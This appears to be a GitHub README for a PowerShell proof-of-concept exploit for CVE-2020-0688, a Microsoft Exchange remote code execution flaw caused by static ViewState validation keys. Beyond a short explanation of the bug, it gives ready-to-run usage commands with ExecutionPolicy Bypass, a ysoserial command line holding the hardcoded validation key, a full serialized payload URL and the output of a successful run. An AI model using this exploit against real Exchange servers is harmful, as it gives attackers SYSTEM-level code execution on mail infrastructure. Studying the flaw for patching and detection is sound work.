CVE-2020-0688 Microsoft Exchange Remote Code Execution With POC

CVE-2020-0688

Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys


A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.

Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.

About Vulnerability

The bug is found in the Exchange Control Panel (ECP) component. The nature of the bug is quite simple. Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in web.config. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the __VIEWSTATE request parameter.

Due to the use of static keys, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel web application, which runs as SYSTEM. (Source)

Getting Started

Thanks to these instructions, you can get a copy of the project up and run on your local machine for development and testing purposes.

Prerequisites

  • PowerShell

Installation

git clone https://github.com/MrTiz9/CVE-2020-0688.git

Usage

PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' 
-YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'

[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256

C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" 
--validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug

[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVk
aXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGlu
Z1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADtBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRh
dGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5z
OkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9Ii
BNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgIC
AgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92
aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D


[*] Auto trigger payload...
[+] Status code: 500, Maybe success!

Contributing

Contributions are what make the open source community such a good place to learn, inspire, and create. Any contributions you can provide are greatly appreciated.

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

Authors

Disclaimer

This exploit was developed and published for educational and research purposes only. The author assumes no responsibility for any illegal use. Use it at your own risk and only against systems for which you are authorized to test it.

License

This project is licensed under the GNU General Public License v3.0 – see the LICENSE file for details.